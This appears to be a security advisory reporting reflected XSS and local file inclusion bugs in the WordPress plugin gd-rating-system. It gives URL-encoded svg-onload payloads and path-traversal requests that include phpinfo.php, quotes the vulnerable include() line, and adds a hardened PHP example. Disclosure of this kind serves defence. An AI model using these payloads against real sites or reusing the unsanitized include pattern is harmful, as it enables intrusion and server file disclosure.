Well, sir, I just found some XSS bugs and an LFI (Local File Include) bug here.

ADLab of Venustech

The report link to the wordpress-form is missing because the manager does not wish to put the public in danger, so I'll just write some details here.

XSS

Several PHP files suffer from this bug; more precisely, other files also fail to filter the `panel` parameter before reflecting it.

XSS1

http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-information&panel=x

Weak parameter PoC:

panel=%27%22%3E%3Csvg%2Fonload%3Dconsole.log(%2Fxss%2F)%3E%3C%27%22

XSS2

http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-about&panel=x

Weak parameter PoC:

panel=%27%22%3E%3Csvg%2Fonload%3Dconsole.log(%2Fxss2%2F)%3E%3C%27%22

XSS3

http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-transfer&panel=x

Weak parameter PoC:

panel=%27%22%3E%3Csvg%2Fonload%3Dconsole.log(%2Fxss3%2F)%3E%3C%27%22

XSS4

http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-tools&panel=x

Weak parameter PoC:

panel=%27%22%3E%3Csvg%2Fonload%3Dconsole.log(%2Fxss4%2F)%3E%3C%27%22

LFI

Here we use the bug to include the "phpinfo.php" file in the web root; more precisely, any file on the web server can be included or read. The weak code appends ".php" to the parameter, so the traversal value names phpinfo without the extension.

LFI1 PoC

http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-information&panel=..%2F..%2F..%2F..%2F..%2F..%2Fphpinfo

Weak file:

/forms/information.php

Weak code:

include(GDRTS_PATH.'forms/panels/'.$_panel.'.php');

LFI2 PoC

http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-about&panel=..%2F..%2F..%2F..%2F..%2F..%2Fphpinfo

Weak file:

/forms/about.php

Weak code:

include(GDRTS_PATH.'forms/panels/'.$_panel.'.php');

LFI3 PoC

http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-transfer&panel=..%2F..%2F..%2F..%2F..%2F..%2Fphpinfo

Weak file:

/forms/transfer.php

Weak code:

include(GDRTS_PATH.'forms/panels/'.$_panel.'.php');

LFI4 PoC

http://localhost/wordpress/wp-admin/admin.php?page=gd-rating-system-tools&panel=..%2F..%2F..%2F..%2F..%2F..%2Fphpinfo

Weak file:

/forms/tools.php

Weak code:

include(GDRTS_PATH.'forms/panels/'.$_panel.'.php');
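The pattern the four weak lines share, as an added example that is neither the plugin's nor the report author's code: the raw panel value reaching both include() and the page markup, next to a hardened version that allowlists the panel name and escapes it on output. GDRTS_PATH, the panel names and the input element are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's own code: the include/echo pattern the report
// describes next to a hardened version. GDRTS_PATH and the panel names
// ('general', 'advanced') are assumed for illustration.
define('GDRTS_PATH', '/var/www/wordpress/wp-content/plugins/gd-rating-system/');

// Shape of the reported bug: the raw request value reaches both the page HTML
// and include(), so "../../../../../../phpinfo" walks out of forms/panels/
// (the appended ".php" then selects phpinfo.php) and '"><svg/onload=...>
// breaks out of the attribute.
function gdrts_panel_vulnerable(string $panel): array {
    $file = GDRTS_PATH . 'forms/panels/' . $panel . '.php';
    $html = '<input type="hidden" name="panel" value="' . $panel . '">';
    return ['file' => $file, 'html' => $html];
}

// Hardened: the request only chooses among known panel names, and the name
// is escaped before it is reflected. Inside WordPress esc_attr() does the
// escaping; htmlspecialchars() keeps this runnable outside WordPress.
function gdrts_panel_hardened(string $panel, array $allowed = ['general', 'advanced']): array {
    if (!in_array($panel, $allowed, true)) {
        $panel = $allowed[0];   // unknown value: fall back to the default panel
    }
    // Belt and braces: even an allowlisted name must be a plain identifier,
    // so no path separator or dot can ever reach the include path.
    if (!preg_match('/^[a-z0-9_-]+$/', $panel)) {
        throw new RuntimeException('invalid panel name');
    }
    $file = GDRTS_PATH . 'forms/panels/' . $panel . '.php';
    $safe = htmlspecialchars($panel, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $html = '<input type="hidden" name="panel" value="' . $safe . '">';
    return ['file' => $file, 'html' => $html];
}

// Decoded forms of the two PoC values quoted in the report.
$lfi = urldecode('..%2F..%2F..%2F..%2F..%2F..%2Fphpinfo');
$xss = urldecode('%27%22%3E%3Csvg%2Fonload%3Dconsole.log(%2Fxss%2F)%3E%3C%27%22');

foreach ([$lfi, $xss] as $value) {
    echo "vulnerable: ", gdrts_panel_vulnerable($value)['file'], "\n";
    echo "hardened:   ", gdrts_panel_hardened($value)['file'], "\n";
    echo "reflected:  ", gdrts_panel_hardened($value)['html'], "\n\n";
}
```

Run with `php example.php`: the vulnerable path leaves forms/panels/ for the traversal value, while the hardened version resolves both PoC values to the default panel and reflects only an escaped name.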

Well, by the way, I just tested these bugs in WordPress 4.9.1 and the latest version of the wp-plugin gd-rating-system.